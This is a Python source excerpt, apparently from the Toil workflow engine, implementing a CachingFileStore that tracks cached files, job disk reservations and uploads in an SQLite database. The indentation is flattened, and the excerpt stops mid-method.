def __init__(self, jobStore, jobGraph, localTempDir, waitForPreviousCommit):
super(CachingFileStore, self).__init__(jobStore, jobGraph, localTempDir, waitForPreviousCommit)
# For testing, we have the ability to force caching to be non-free, by never linking from the file store
self.forceNonFreeCaching = False
# Also for testing, we have the ability to force a delay (in seconds)
# during file download from the job store, in order to easily test the
# behavior of the system when a download is in progress.
self.forceDownloadDelay = None
# When waiting for other running workers to download a file, or
# otherwise progress, how long in seconds should we wait between
# polling attempts? Our mechanism for polling involves an exclusive
# lock on the database and conditional writes, so this should be high
# enough that everyone isn't constantly contending for the lock.
self.contentionBackoff = 15
# Variables related to caching
# Decide where the cache directory will be. We put it next to the
# local temp dirs for all of the jobs run on this machine.
# At this point in worker startup, when we are setting up caching,
# localTempDir is the worker directory, not the job directory.
self.localCacheDir = os.path.join(os.path.dirname(localTempDir),
cacheDirName(self.jobStore.config.workflowID))
        # Since each worker has its own unique CachingFileStore instance, and only one Job can run
# at a time on a worker, we can track some stuff about the running job in ourselves.
self.jobName = str(self.jobGraph)
self.jobID = self.jobGraph.jobStoreID
logger.debug('Starting job (%s) with ID (%s).', self.jobName, self.jobID)
# When the job actually starts, we will fill this in with the job's disk requirement.
self.jobDiskBytes = None
# We need to track what attempt of the workflow we are, to prevent crosstalk between attempts' caches.
self.workflowAttemptNumber = self.jobStore.config.workflowAttemptNumber
# Make sure the cache directory exists
os.makedirs(self.localCacheDir, exist_ok=True)
# Connect to the cache database in there, or create it if not present.
# We name it by workflow attempt number in case a previous attempt of
# the workflow left one behind without cleaning up properly; we need to
# be able to tell that from showing up on a machine where a cache has
# already been created.
self.dbPath = os.path.join(self.localCacheDir, 'cache-{}.db'.format(self.workflowAttemptNumber))
# We need to hold onto both a connection (to commit) and a cursor (to actually use the database)
self.con = sqlite3.connect(self.dbPath, timeout=SQLITE_TIMEOUT_SECS)
self.cur = self.con.cursor()
# Note that sqlite3 automatically starts a transaction when we go to
# modify the database.
# To finish this transaction and let other people read our writes (or
# write themselves), we need to COMMIT after every coherent set of
# writes.
# Set up the tables
self._ensureTables(self.con)
# Initialize the space accounting properties
freeSpace, _ = getFileSystemSize(self.localCacheDir)
self._write([('INSERT OR IGNORE INTO properties VALUES (?, ?)', ('maxSpace', freeSpace))])
# Space used by caching and by jobs is accounted with queries
# We maintain an asynchronous upload thread, which gets kicked off when
# we commit the job's completion. It will be None until then. When it
# is running, it has exclusive control over our database connection,
# because the job we exist for will have already completed. However, it
# has to coordinate its activities with other CachingFileStore objects
# in the same process (and thus sharing the same PID) and ensure that
# only one of them is working on uploading any given file at any given
# time.
self.commitThread = None
@staticmethod
@retry(infinite_retries=True,
errors=[
ErrorCondition(
error=sqlite3.OperationalError,
error_message_must_include='is locked')
])
def _staticWrite(con, cur, operations):
"""
Write to the caching database, using the given connection.
If we can't get an SQLite write lock on the database, retry with some
backoff until we can.
operations is a list of tuples of (sql string, optional tuple of values
to substitute), or bare sql strings.
All operations are executed in a single transaction, which is
committed.
:param sqlite3.Connection con: Connection to the cache database.
:param sqlite3.Cursor cur: Cursor in the cache database.
:param list operations: List of sql strings or tuples of (sql, optional values) to execute.
:return: Number of rows modified by the last operation
:rtype: int
"""
try:
for item in operations:
if not isinstance(item, tuple):
# Must be a single SQL string. Wrap it.
item = (item,)
# Parse out the command and the variables to substitute
command = item[0]
if len(item) < 2:
args = ()
else:
args = item[1]
# Do it
cur.execute(command, args)
except Exception as e:
logging.error('Error talking to caching database: %s', str(e))
# Try to make sure we don't somehow leave anything part-done if a
# middle operation somehow fails.
try:
con.rollback()
except:
# But don't stop if we can't roll back.
pass
# Raise and maybe retry
raise e
else:
# The transaction worked!
# Now commit the transaction.
con.commit()
return cur.rowcount
def _write(self, operations):
"""
Write to the caching database, using the instance's connection
If we can't get an SQLite write lock on the database, retry with some
backoff until we can.
operations is a list of tuples of (sql string, optional tuple of values
to substitute), or bare sql strings.
All operations are executed in a single transaction, which is
committed.
:param list operations: List of sql strings or tuples of (sql, optional values) to execute.
:return: Number of rows modified by the last operation
:rtype: int
"""
return self._staticWrite(self.con, self.cur, operations)
@classmethod
def _ensureTables(cls, con):
"""
Ensure that the database tables we expect exist.
:param sqlite3.Connection con: Connection to the cache database.
"""
# Get a cursor
cur = con.cursor()
cls._staticWrite(con, cur, ["""
CREATE TABLE IF NOT EXISTS files (
id TEXT NOT NULL PRIMARY KEY,
path TEXT UNIQUE NOT NULL,
size INT NOT NULL,
state TEXT NOT NULL,
owner TEXT
)
""", """
CREATE TABLE IF NOT EXISTS refs (
path TEXT NOT NULL,
file_id TEXT NOT NULL,
job_id TEXT NOT NULL,
state TEXT NOT NULL,
PRIMARY KEY (path, file_id)
)
""", """
CREATE TABLE IF NOT EXISTS jobs (
id TEXT NOT NULL PRIMARY KEY,
tempdir TEXT NOT NULL,
disk INT NOT NULL,
worker TEXT
)
""", """
CREATE TABLE IF NOT EXISTS properties (
name TEXT NOT NULL PRIMARY KEY,
value INT NOT NULL
)
"""])
# Caching-specific API
def getCacheLimit(self):
"""
Return the total number of bytes to which the cache is limited.
If no limit is available, raises an error.
"""
for row in self.cur.execute('SELECT value FROM properties WHERE name = ?', ('maxSpace',)):
return row[0]
raise RuntimeError('Unable to retrieve cache limit')
def getCacheUsed(self):
"""
Return the total number of bytes used in the cache.
If no value is available, raises an error.
"""
# Space never counts as used if caching is free
if self.cachingIsFree():
return 0
for row in self.cur.execute('SELECT TOTAL(size) FROM files'):
return row[0]
raise RuntimeError('Unable to retrieve cache usage')
def getCacheExtraJobSpace(self):
"""
Return the total number of bytes of disk space requested by jobs
running against this cache but not yet used.
We can get into a situation where the jobs on the node take up all its
space, but then they want to write to or read from the cache. So when
that happens, we need to debit space from them somehow...
If no value is available, raises an error.
"""
# Total up the sizes of all the reads of files and subtract it from the total disk reservation of all jobs
for row in self.cur.execute("""
SELECT (
(SELECT TOTAL(disk) FROM jobs) -
(SELECT TOTAL(files.size) FROM refs INNER JOIN files ON refs.file_id = files.id WHERE refs.state == 'immutable')
) as result
"""):
return row[0]
raise RuntimeError('Unable to retrieve extra job space')
def getCacheAvailable(self):
"""
Return the total number of free bytes available for caching, or, if
negative, the total number of bytes of cached files that need to be
evicted to free up enough space for all the currently scheduled jobs.
If no value is available, raises an error.
"""
# Get the max space on our disk.
# Subtract out the number of bytes of cached content.
# Also subtract out the number of bytes of job disk requirements that
# aren't being spent by those jobs on immutable references to cached
# content.
# Do a little report first
for row in self.cur.execute("SELECT value FROM properties WHERE name = 'maxSpace'"):
logger.debug('Max space: %d', row[0])
for row in self.cur.execute("SELECT TOTAL(size) FROM files"):
logger.debug('Total file size: %d', row[0])
for row in self.cur.execute("SELECT TOTAL(disk) FROM jobs"):
logger.debug('Total job disk requirement size: %d', row[0])
for row in self.cur.execute("SELECT TOTAL(files.size) FROM refs INNER JOIN files ON refs.file_id = files.id WHERE refs.state = 'immutable'"):
logger.debug('Total immutable reference size: %d', row[0])
if self.cachingIsFree():
# If caching is free, we just say that all the space is always available.
for row in self.cur.execute("SELECT value FROM properties WHERE name = 'maxSpace'"):
return row[0]
raise RuntimeError('Unable to retrieve available cache space')
for row in self.cur.execute("""
SELECT (
(SELECT value FROM properties WHERE name = 'maxSpace') -
(SELECT TOTAL(size) FROM files) -
((SELECT TOTAL(disk) FROM jobs) -
(SELECT TOTAL(files.size) FROM refs INNER JOIN files ON refs.file_id = files.id WHERE refs.state = 'immutable'))
) as result
"""):
return row[0]
raise RuntimeError('Unable to retrieve available cache space')
def getSpaceUsableForJobs(self):
"""
Return the total number of bytes that are not taken up by job requirements, ignoring files and file usage.
We can't ever run more jobs than we actually have room for, even with caching.
If not retrievable, raises an error.
"""
for row in self.cur.execute("""
SELECT (
(SELECT value FROM properties WHERE name = 'maxSpace') -
(SELECT TOTAL(disk) FROM jobs)
) as result
"""):
return row[0]
        raise RuntimeError('Unable to retrieve usable space for jobs')
def getCacheUnusedJobRequirement(self):
"""
Return the total number of bytes of disk space requested by the current
job and not used by files the job is using in the cache.
Mutable references don't count, but immutable/uploading ones do.
If no value is available, raises an error.
"""
logger.debug('Get unused space for job %s', self.jobID)
for row in self.cur.execute('SELECT * FROM files'):
logger.debug('File record: %s', str(row))
for row in self.cur.execute('SELECT * FROM refs'):
logger.debug('Ref record: %s', str(row))
for row in self.cur.execute('SELECT TOTAL(files.size) FROM refs INNER JOIN files ON refs.file_id = files.id WHERE refs.job_id = ? AND refs.state != ?',
(self.jobID, 'mutable')):
# Sum up all the sizes of our referenced files, then subtract that from how much we came in with
return self.jobDiskBytes - row[0]
raise RuntimeError('Unable to retrieve unused job requirement space')
def adjustCacheLimit(self, newTotalBytes):
"""
Adjust the total cache size limit to the given number of bytes.
"""
self._write([('UPDATE properties SET value = ? WHERE name = ?', (newTotalBytes, 'maxSpace'))])
def fileIsCached(self, fileID):
"""
Return true if the given file is currently cached, and false otherwise.
Note that this can't really be relied upon because a file may go cached
-> deleting after you look at it. If you need to do something with the
file you need to do it in a transaction.
"""
for row in self.cur.execute('SELECT COUNT(*) FROM files WHERE id = ? AND (state = ? OR state = ? OR state = ?)',
(fileID, 'cached', 'uploadable', 'uploading')):
return row[0] > 0
return False
def getFileReaderCount(self, fileID):
"""
Return the number of current outstanding reads of the given file.
Counts mutable references too.
"""
for row in self.cur.execute('SELECT COUNT(*) FROM refs WHERE file_id = ?', (fileID,)):
return row[0]
return 0
def cachingIsFree(self):
"""
Return true if files can be cached for free, without taking up space.
Return false otherwise.
This will be true when working with certain job stores in certain
configurations, most notably the FileJobStore.
"""
for row in self.cur.execute('SELECT value FROM properties WHERE name = ?', ('freeCaching',)):
return row[0] == 1
# Otherwise we need to set it
from toil.jobStores.fileJobStore import FileJobStore
if isinstance(self.jobStore, FileJobStore) and not self.forceNonFreeCaching:
# Caching may be free since we are using a file job store.
# Create an empty file.
emptyID = self.jobStore.getEmptyFileStoreID()
# Read it out to a generated name.
destDir = tempfile.mkdtemp(dir=self.localCacheDir)
cachedFile = os.path.join(destDir, 'sniffLinkCount')
self.jobStore.readFile(emptyID, cachedFile, symlink=False)
# Check the link count
if os.stat(cachedFile).st_nlink == 2:
# Caching must be free
free = 1
else:
# If we only have one link, caching costs disk.
free = 0
# Clean up
os.unlink(cachedFile)
os.rmdir(destDir)
self.jobStore.deleteFile(emptyID)
else:
# Caching is only ever free with the file job store
free = 0
# Save to the database if we're the first to work this out
self._write([('INSERT OR IGNORE INTO properties VALUES (?, ?)', ('freeCaching', free))])
# Return true if we said caching was free
return free == 1
# Internal caching logic
def _getNewCachingPath(self, fileStoreID):
"""
Get a path at which the given file ID can be cached.
Will be unique for every call.
The file will not be created if it does not exist.
"""
# Hash the file ID
hasher = hashlib.sha1()
hasher.update(fileStoreID.encode('utf-8'))
# Get a unique temp file name, including the file ID's hash to make
# sure we can never collide even though we are going to remove the
# file.
# TODO: use a de-slashed version of the ID instead?
handle, path = tempfile.mkstemp(dir=self.localCacheDir, suffix=hasher.hexdigest())
os.close(handle)
os.unlink(path)
return path
def _stealWorkFromTheDead(self):
"""
Take ownership of any files we can see whose owners have died.
We don't actually process them here. We take action based on the states of files we own later.
"""
me = get_process_name(self.workDir)
# Get a list of all file owner processes on this node.
# Exclude NULL because it comes out as 0 and we can't look for PID 0.
owners = []
for row in self.cur.execute('SELECT DISTINCT owner FROM files WHERE owner IS NOT NULL'):
owners.append(row[0])
# Work out which of them have died.
deadOwners = []
for owner in owners:
if not process_name_exists(self.workDir, owner):
logger.debug('Owner %s is dead', owner)
deadOwners.append(owner)
else:
logger.debug('Owner %s is alive', owner)
for owner in deadOwners:
# Try and adopt all the files that any dead owner had
# If they were deleting, we delete.
# If they were downloading, we delete. Any outstanding references
# can't be in use since they are from the dead downloader.
# If they were uploading or uploadable, we mark as cached even
# though it never made it to the job store (and leave it unowned).
#
# Once the dead job that it was being uploaded from is cleaned up,
# and there are no longer any immutable references, it will be
# evicted as normal. Since the dead job can't have been marked
# successfully completed (since the file is still not uploaded),
# nobody is allowed to actually try and use the file.
#
# TODO: if we ever let other PIDs be responsible for writing our
# files asynchronously, this will need to change.
self._write([('UPDATE files SET owner = ?, state = ? WHERE owner = ? AND state = ?',
(me, 'deleting', owner, 'deleting')),
('UPDATE files SET owner = ?, state = ? WHERE owner = ? AND state = ?',
(me, 'deleting', owner, 'downloading')),
('UPDATE files SET owner = NULL, state = ? WHERE owner = ? AND (state = ? OR state = ?)',
('cached', owner, 'uploadable', 'uploading'))])
logger.debug('Tried to adopt file operations from dead worker %s to ourselves as %s', owner, me)
@classmethod
def _executePendingDeletions(cls, workDir, con, cur):
"""
Delete all the files that are registered in the database as in the
process of being deleted from the cache by us.
Returns the number of files that were deleted.
Implemented as a class method so it can use the database connection
appropriate to its thread without any chance of getting at the main
thread's connection and cursor in self.
:param str workDir: The Toil work directory.
:param sqlite3.Connection con: Connection to the cache database.
:param sqlite3.Cursor cur: Cursor in the cache database.
"""
me = get_process_name(workDir)
# Remember the file IDs we are deleting
deletedFiles = []
for row in cur.execute('SELECT id, path FROM files WHERE owner = ? AND state = ?', (me, 'deleting')):
# Grab everything we are supposed to delete and delete it
fileID = row[0]
filePath = row[1]
try:
os.unlink(filePath)
logger.debug('Successfully deleted: %s', filePath)
except OSError:
# Probably already deleted
logger.debug('File already gone: %s', filePath)
# Still need to mark it as deleted
pass
# Whether we deleted the file or just found out that it is gone, we
# need to take credit for deleting it so that we remove it from the
# database.
deletedFiles.append(fileID)
for fileID in deletedFiles:
# Drop all the files. They should have stayed in deleting state. We move them from there to not present at all.
# Also drop their references, if they had any from dead downloaders.
cls._staticWrite(con, cur, [('DELETE FROM files WHERE id = ? AND state = ?', (fileID, 'deleting')),
('DELETE FROM refs WHERE file_id = ?', (fileID,))])
return len(deletedFiles)
def _executePendingUploads(self, con, cur):
"""
Uploads all files in uploadable state that we own.
Returns the number of files that were uploaded.
Needs access to self to get at the job store for uploading files, but
still needs to take con and cur so it can run in a thread with the
thread's database connection.
:param sqlite3.Connection con: Connection to the cache database.
:param sqlite3.Cursor cur: Cursor in the cache database.
"""
# Work out who we are
me = get_process_name(self.workDir)
# Record how many files we upload
uploadedCount = 0
while True:
# Try and find a file we might want to upload
fileID = None
filePath = None
for row in cur.execute('SELECT id, path FROM files WHERE state = ? AND owner = ? LIMIT 1', ('uploadable', me)):
fileID = row[0]
filePath = row[1]
if fileID is None:
# Nothing else exists to upload
break
# We need to set it to uploading in a way that we can detect that *we* won the update race instead of anyone else.
rowCount = self._staticWrite(con, cur, [('UPDATE files SET state = ? WHERE id = ? AND state = ?', ('uploading', fileID, 'uploadable'))])
if rowCount != 1:
# We didn't manage to update it. Someone else (a running job if
                # we are a committing thread, or vice versa) must have grabbed
# it.
logger.debug('Lost race to upload %s', fileID)
# Try again to see if there is something else to grab.
continue
# Upload the file
logger.debug('Actually executing upload for file %s', fileID)
try:
self.jobStore.updateFile(fileID, filePath)
except:
# We need to set the state back to 'uploadable' in case of any failures to ensure
# we can retry properly.
self._staticWrite(con, cur, [('UPDATE files SET state = ? WHERE id = ? AND state = ?', ('uploadable', fileID, 'uploading'))])
raise
# Count it for the total uploaded files value we need to return
uploadedCount += 1
# Remember that we uploaded it in the database
self._staticWrite(con, cur, [('UPDATE files SET state = ?, owner = NULL WHERE id = ?', ('cached', fileID))])
return uploadedCount
def _allocateSpaceForJob(self, newJobReqs):
"""
A new job is starting that needs newJobReqs space.
We need to record that we have a job running now that needs this much space.
We also need to evict enough stuff from the cache so that we have room
for this job to fill up that much space even if it doesn't cache
anything.
localTempDir must have already been pointed to the job's temp dir.
:param float newJobReqs: the total number of bytes that this job requires.
"""
# Put an entry in the database for this job being run on this worker.
# This will take up space for us and potentially make the cache over-full.
# But we won't actually let the job run and use any of this space until
# the cache has been successfully cleared out.
me = get_process_name(self.workDir)
self._write([('INSERT INTO jobs VALUES (?, ?, ?, ?)', (self.jobID, self.localTempDir, newJobReqs, me))])
# Now we need to make sure that we can fit all currently cached files,
# and the parts of the total job requirements not currently spent on
# cached files, in under the total disk space limit.
available = self.getCacheAvailable()
logger.debug('Available space with job: %d bytes', available)
if available >= 0:
# We're fine on disk space
return
# Otherwise we need to clear stuff.
self._freeUpSpace()
@classmethod
def _removeJob(cls, con, cur, jobID):
"""
Get rid of the job with the given ID.
The job must be owned by us.
Deletes the job's database entry, all its references, and its whole
temporary directory.
:param sqlite3.Connection con: Connection to the cache database.
:param sqlite3.Cursor cur: Cursor in the cache database.
:param str jobID: Hash-based ID of the job being removed. Not a Toil JobStore ID.
"""
# Get the job's temp dir
for row in cur.execute('SELECT tempdir FROM jobs WHERE id = ?', (jobID,)):
jobTemp = row[0]
for row in cur.execute('SELECT path FROM refs WHERE job_id = ?', (jobID,)):
try:
# Delete all the reference files.
os.unlink(row[0])
except OSError:
# May not exist
pass
# And their database entries
cls._staticWrite(con, cur, [('DELETE FROM refs WHERE job_id = ?', (jobID,))])
try:
# Delete the job's temp directory to the extent that we can.
shutil.rmtree(jobTemp)
except OSError:
pass
# Strike the job from the database
cls._staticWrite(con, cur, [('DELETE FROM jobs WHERE id = ?', (jobID,))])
def _deallocateSpaceForJob(self):
"""
Our current job that was using oldJobReqs space has finished.
We need to record that the job is no longer running, so its space not
taken up by files in the cache will be free.
"""
self._removeJob(self.con, self.cur, self.jobID)
def _tryToFreeUpSpace(self):
"""
If disk space is overcommitted, try one round of collecting files to upload/download/delete/evict.
Return whether we manage to get any space freed or not.
"""
# First we want to make sure that dead jobs aren't holding
# references to files and keeping them from looking unused.
self._removeDeadJobs(self.workDir, self.con)
# Adopt work from any dead workers
self._stealWorkFromTheDead()
if self._executePendingDeletions(self.workDir, self.con, self.cur) > 0:
# We actually had something to delete, which we deleted.
# Maybe there is space now
logger.debug('Successfully executed pending deletions to free space')
return True
if self._executePendingUploads(self.con, self.cur) > 0:
# We had something to upload. Maybe it can be evicted now.
logger.debug('Successfully executed pending uploads to free space')
return True
# Otherwise, not enough files could be found in deleting state to solve our problem.
# We need to put something into the deleting state.
# TODO: give other people time to finish their in-progress
# evictions before starting more, or we might evict everything as
# soon as we hit the cache limit.
# Find something that has no non-mutable references and is not already being deleted.
self.cur.execute("""
SELECT files.id FROM files WHERE files.state = 'cached' AND NOT EXISTS (
SELECT NULL FROM refs WHERE refs.file_id = files.id AND refs.state != 'mutable'
) LIMIT 1
""")
row = self.cur.fetchone()
if row is None:
# Nothing can be evicted by us.
# Someone else might be in the process of evicting something that will free up space for us too.
            # Or someone might be uploading something and we have to wait for them to finish before it can be deleted.
logger.debug('Could not find anything to evict! Cannot free up space!')
return False
# Otherwise we found an eviction candidate.
fileID = row[0]
# Work out who we are
me = get_process_name(self.workDir)
# Try and grab it for deletion, subject to the condition that nothing has started reading it
self._write([("""
UPDATE files SET owner = ?, state = ? WHERE id = ? AND state = ?
AND owner IS NULL AND NOT EXISTS (
SELECT NULL FROM refs WHERE refs.file_id = files.id AND refs.state != 'mutable'
)
""",
(me, 'deleting', fileID, 'cached'))])
logger.debug('Evicting file %s', fileID)
# Whether we actually got it or not, try deleting everything we have to delete
if self._executePendingDeletions(self.workDir, self.con, self.cur) > 0:
# We deleted something
logger.debug('Successfully executed pending deletions to free space')
return True
def _freeUpSpace(self):
"""
        If disk space is overcommitted, block and evict eligible things from the
cache until it is no longer overcommitted.
"""
availableSpace = self.getCacheAvailable()
# Track how long we are willing to wait for cache space to free up without making progress evicting things before we give up.
        # This is the longest that we will wait for uploads and other deleters.
patience = 10
while availableSpace < 0:
# While there isn't enough space for the thing we want
logger.debug('Cache is full (%d bytes free). Trying to free up space!', availableSpace)
# Free up space. See if we made any progress
progress = self._tryToFreeUpSpace()
availableSpace = self.getCacheAvailable()
if progress:
# Reset our patience
patience = 10
else:
# See if we've been oversubscribed.
jobSpace = self.getSpaceUsableForJobs()
if jobSpace < 0:
logger.critical('Jobs on this machine have oversubscribed our total available space (%d bytes)!', jobSpace)
raise CacheUnbalancedError
else:
patience -= 1
if patience <= 0:
logger.critical('Waited implausibly long for active uploads and deletes.')
raise CacheUnbalancedError
else:
# Wait a bit and come back
time.sleep(2)
logger.debug('Cache has %d bytes free.', availableSpace)
# Normal AbstractFileStore API
@contextmanager
def open(self, job):
"""
This context manager decorated method allows cache-specific operations to be conducted
before and after the execution of a job in worker.py
"""
# Create a working directory for the job
startingDir = os.getcwd()
# Move self.localTempDir from the worker directory set up in __init__ to a per-job directory.
self.localTempDir = makePublicDir(os.path.join(self.localTempDir, str(uuid.uuid4())))
# Check the status of all jobs on this node. If there are jobs that started and died before
# cleaning up their presence from the database, clean them up ourselves.
self._removeDeadJobs(self.workDir, self.con)
# Get the requirements for the job.
self.jobDiskBytes = job.disk
logger.debug('Actually running job (%s) with ID (%s) which wants %d of our %d bytes.',
self.jobName, self.jobID, self.jobDiskBytes, self.getCacheLimit())
# Register the current job as taking this much space, and evict files
# from the cache to make room before letting the job run.
self._allocateSpaceForJob(self.jobDiskBytes)
try:
os.chdir(self.localTempDir)
yield
finally:
# See how much disk space is used at the end of the job.
# Not a real peak disk usage, but close enough to be useful for warning the user.
# TODO: Push this logic into the abstract file store
diskUsed = getDirSizeRecursively(self.localTempDir)
logString = ("Job {jobName} used {percent:.2f}% ({humanDisk}B [{disk}B] used, "
"{humanRequestedDisk}B [{requestedDisk}B] requested) at the end of "
"its run.".format(jobName=self.jobName,
percent=(float(diskUsed) / self.jobDiskBytes * 100 if
self.jobDiskBytes > 0 else 0.0),
humanDisk=bytes2human(diskUsed),
disk=diskUsed,
humanRequestedDisk=bytes2human(self.jobDiskBytes),
requestedDisk=self.jobDiskBytes))
self.logToMaster(logString, level=logging.DEBUG)
if diskUsed > self.jobDiskBytes:
self.logToMaster("Job used more disk than requested. Please reconsider modifying "
"the user script to avoid the chance of failure due to "
"incorrectly requested resources. " + logString,
level=logging.WARNING)
# Go back up to the per-worker local temp directory.
os.chdir(startingDir)
self.cleanupInProgress = True
# Record that our job is no longer using its space, and clean up
# its temp dir and database entry.
self._deallocateSpaceForJob()
def writeGlobalFile(self, localFileName, cleanup=False):
# Work out the file itself
absLocalFileName = self._resolveAbsoluteLocalPath(localFileName)
# And get its size
fileSize = os.stat(absLocalFileName).st_size
# Work out who is making the file
creatorID = self.jobGraph.jobStoreID
# Create an empty file to get an ID.
# Make sure to pass along the file basename.
# TODO: this empty file could leak if we die now...
fileID = self.jobStore.getEmptyFileStoreID(creatorID, cleanup, os.path.basename(localFileName))
# Work out who we are
me = get_process_name(self.workDir)
# Work out where the file ought to go in the cache
cachePath = self._getNewCachingPath(fileID)
# Create a file in uploadable state and a reference, in the same transaction.
# Say the reference is an immutable reference
self._write([('INSERT INTO files VALUES (?, ?, ?, ?, ?)', (fileID, cachePath, fileSize, 'uploadable', me)),
('INSERT INTO refs VALUES (?, ?, ?, ?)', (absLocalFileName, fileID, creatorID, 'immutable'))])
if absLocalFileName.startswith(self.localTempDir) and not os.path.islink(absLocalFileName):
# We should link into the cache, because the upload is coming from our local temp dir (and not via a symlink in there)
try:
# Try and hardlink the file into the cache.
# This can only fail if the system doesn't have hardlinks, or the
# file we're trying to link to has too many hardlinks to it
# already, or something.
os.link(absLocalFileName, cachePath)
linkedToCache = True
logger.debug('Hardlinked file %s into cache at %s; deferring write to job store', localFileName, cachePath)
assert not os.path.islink(cachePath), "Symlink %s has invaded cache!" % cachePath
# Don't do the upload now. Let it be deferred until later (when the job is committing).
except OSError:
# We couldn't make the link for some reason
linkedToCache = False
else:
# If you are uploading a file that physically exists outside the
# local temp dir, it should not be linked into the cache. On
# systems that support it, we could end up with a
# hardlink-to-symlink in the cache if we break this rule, allowing
# files to vanish from our cache.
linkedToCache = False
if not linkedToCache:
# If we can't do the link into the cache and upload from there, we
# have to just upload right away. We can't guarantee sufficient
# space to make a full copy in the cache, if we aren't allowed to
# take this copy away from the writer.
# Change the reference to 'mutable', which it will be.
# And drop the file altogether.
self._write([('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('mutable', absLocalFileName, fileID)),
('DELETE FROM files WHERE id = ?', (fileID,))])
# Save the file to the job store right now
logger.debug('Actually executing upload immediately for file %s', fileID)
self.jobStore.updateFile(fileID, absLocalFileName)
# Ship out the completed FileID object with its real size.
return FileID.forPath(fileID, absLocalFileName)
def readGlobalFile(self, fileStoreID, userPath=None, cache=True, mutable=False, symlink=False):
if str(fileStoreID) in self.filesToDelete:
# File has already been deleted
raise FileNotFoundError('Attempted to read deleted file: {}'.format(fileStoreID))
if userPath is not None:
# Validate the destination we got
localFilePath = self._resolveAbsoluteLocalPath(userPath)
if os.path.exists(localFilePath):
                raise RuntimeError('File %s exists. Cannot overwrite.' % localFilePath)
else:
# Make our own destination
localFilePath = self.getLocalTempFileName()
# Work out what job we are operating on behalf of
readerID = self.jobGraph.jobStoreID
if cache:
# We want to use the cache
if mutable:
return self._readGlobalFileMutablyWithCache(fileStoreID, localFilePath, readerID)
else:
return self._readGlobalFileWithCache(fileStoreID, localFilePath, symlink, readerID)
else:
# We do not want to use the cache
return self._readGlobalFileWithoutCache(fileStoreID, localFilePath, mutable, symlink, readerID)
def _readGlobalFileWithoutCache(self, fileStoreID, localFilePath, mutable, symlink, readerID):
"""
Read a file without putting it into the cache.
:param toil.fileStores.FileID fileStoreID: job store id for the file
:param str localFilePath: absolute destination path. Already known not to exist.
:param bool mutable: Whether a mutable copy should be created, instead of a hard link or symlink.
:param bool symlink: Whether a symlink is acceptable.
:param str readerID: Job ID of the job reading the file.
:return: An absolute path to a local, temporary copy of or link to the file keyed by fileStoreID.
:rtype: str
"""
# We would like to read directly from the backing job store, since
# we don't want to cache the result. However, we may be trying to
# read a file that is 'uploadable' or 'uploading' and hasn't hit
# the backing job store yet.
# Try and make a 'copying' reference to such a file
self._write([('INSERT INTO refs SELECT ?, id, ?, ? FROM files WHERE id = ? AND (state = ? OR state = ?)',
(localFilePath, readerID, 'copying', fileStoreID, 'uploadable', 'uploading'))])
# See if we got it
have_reference = False
for row in self.cur.execute('SELECT COUNT(*) FROM refs WHERE path = ? and file_id = ?', (localFilePath, fileStoreID)):
have_reference = row[0] > 0
if have_reference:
# If we succeed, copy the file. We know the job has space for it
# because if we didn't do this we'd be getting a fresh copy from
# the job store.
# Find where the file is cached
cachedPath = None
for row in self.cur.execute('SELECT path FROM files WHERE id = ?', (fileStoreID,)):
cachedPath = row[0]
if cachedPath is None:
raise RuntimeError('File %s went away while we had a reference to it!' % fileStoreID)
if self.forceDownloadDelay is not None:
# Wait around to simulate a big file for testing
time.sleep(self.forceDownloadDelay)
atomic_copy(cachedPath, localFilePath)
# Change the reference to mutable
self._write([('UPDATE refs SET state = ? WHERE path = ? and file_id = ?', ('mutable', localFilePath, fileStoreID))])
else:
# If we fail, the file isn't cached here in 'uploadable' or
# 'uploading' state, so that means it must actually be in the
# backing job store, so we can get it from the backing job store.
# Create a 'mutable' reference (even if we end up with a link)
# so we can see this file in deleteLocalFile.
self._write([('INSERT INTO refs VALUES (?, ?, ?, ?)',
(localFilePath, fileStoreID, readerID, 'mutable'))])
if self.forceDownloadDelay is not None:
# Wait around to simulate a big file for testing
time.sleep(self.forceDownloadDelay)
# Just read directly
if mutable or self.forceNonFreeCaching:
# Always copy
with self.jobStore.readFileStream(fileStoreID) as inStream:
atomic_copyobj(inStream, localFilePath)
else:
# Link or maybe copy
self.jobStore.readFile(fileStoreID, localFilePath, symlink=symlink)
# Now we got the file, somehow.
return localFilePath
def _downloadToCache(self, fileStoreID, cachedPath):
"""
Copy a file from the file store into the cache.
Will hardlink if appropriate.
:param toil.fileStores.FileID fileStoreID: job store id for the file
:param str cachedPath: absolute destination path in the cache. Already known not to exist.
"""
if self.forceDownloadDelay is not None:
# Wait around to simulate a big file for testing
time.sleep(self.forceDownloadDelay)
if self.forceNonFreeCaching:
# Always copy
with self.jobStore.readFileStream(fileStoreID) as inStream:
atomic_copyobj(inStream, cachedPath)
else:
# Link or maybe copy
self.jobStore.readFile(fileStoreID, cachedPath, symlink=False)
def _readGlobalFileMutablyWithCache(self, fileStoreID, localFilePath, readerID):
"""
Read a mutable copy of a file, putting it into the cache if possible.
:param toil.fileStores.FileID fileStoreID: job store id for the file
:param str localFilePath: absolute destination path. Already known not to exist.
:param str readerID: Job ID of the job reading the file.
:return: An absolute path to a local, temporary copy of or link to the file keyed by fileStoreID.
:rtype: str
"""
# Work out who we are
me = get_process_name(self.workDir)
# Work out where to cache the file if it isn't cached already
cachedPath = self._getNewCachingPath(fileStoreID)
# Start a loop until we can do one of these
while True:
# Try and create a downloading entry if no entry exists
logger.debug('Trying to make file record for id %s', fileStoreID)
self._write([('INSERT OR IGNORE INTO files VALUES (?, ?, ?, ?, ?)',
(fileStoreID, cachedPath, self.getGlobalFileSize(fileStoreID), 'downloading', me))])
# See if we won the race
self.cur.execute('SELECT COUNT(*) FROM files WHERE id = ? AND state = ? AND owner = ?', (fileStoreID, 'downloading', me))
if self.cur.fetchone()[0] > 0:
# We are responsible for downloading the file
logger.debug('We are now responsible for downloading file %s', fileStoreID)
# Make sure we have space for this download.
self._freeUpSpace()
# Do the download into the cache.
self._downloadToCache(fileStoreID, cachedPath)
# Now, we may have to immediately give away this file, because
# we don't have space for two copies.
# If so, we can't let it go to cached state, because someone
# else might make a reference to it, and we may get stuck with
# two readers, one cached copy, and space for two copies total.
# Make the copying reference
self._write([('INSERT INTO refs VALUES (?, ?, ?, ?)',
(localFilePath, fileStoreID, readerID, 'copying'))])
# Fulfill it with a full copy or by giving away the cached copy
self._fulfillCopyingReference(fileStoreID, cachedPath, localFilePath)
# Now we're done
return localFilePath
else:
logger.debug('Someone else is already responsible for file %s', fileStoreID)
# A record already existed for this file.
# Try and create an immutable or copying reference to an entry that
